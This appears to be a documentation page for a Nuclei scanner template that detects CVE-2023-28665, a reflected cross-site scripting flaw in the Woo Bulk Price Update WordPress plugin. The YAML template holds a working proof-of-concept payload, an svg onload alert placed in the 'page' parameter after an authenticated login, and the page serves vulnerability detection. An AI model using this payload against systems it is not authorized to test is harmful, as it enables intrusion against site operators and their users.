Woo Bulk Price Update <2.2.2 - Cross-Site Scripting
ID: CVE-2023-28665
Severity: medium
Author: Aaban SOlutions,harsh
Tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update,technocrackers
Description
Section titled “Description”The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the ‘page’ parameter to the techno_get_products action, which can only be triggered by an authenticated user.
YAML Source
Section titled “YAML Source”id: CVE-2023-28665
info: name: Woo Bulk Price Update <2.2.2 - Cross-Site Scripting author: Aaban SOlutions,harsh severity: medium description: | The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 2.2.2 reference: - https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036 - https://nvd.nist.gov/vuln/detail/CVE-2023-28665 - https://github.com/JoshuaMart/JoshuaMart - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2023-28665 cwe-id: CWE-79 epss-score: 0.00092 epss-percentile: 0.39168 cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: technocrackers product: bulk_price_update_for_woocommerce framework: wordpress tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update,technocrackers
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - 'contains(body_2, "<svg onload=alert(document.domain)>")' - 'contains(body_2, "pagination\":")' condition: and# digest: 4b0a00483046022100a98894ef005d3c3bf4714ab98d4454e3b4b7a94b35df1a2beb025eb69e2f99140221008d3dd3f3241bf158a05ea5d947c0c6ed665cc467a948bcf6da7e0d221136b565:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-28665.yaml"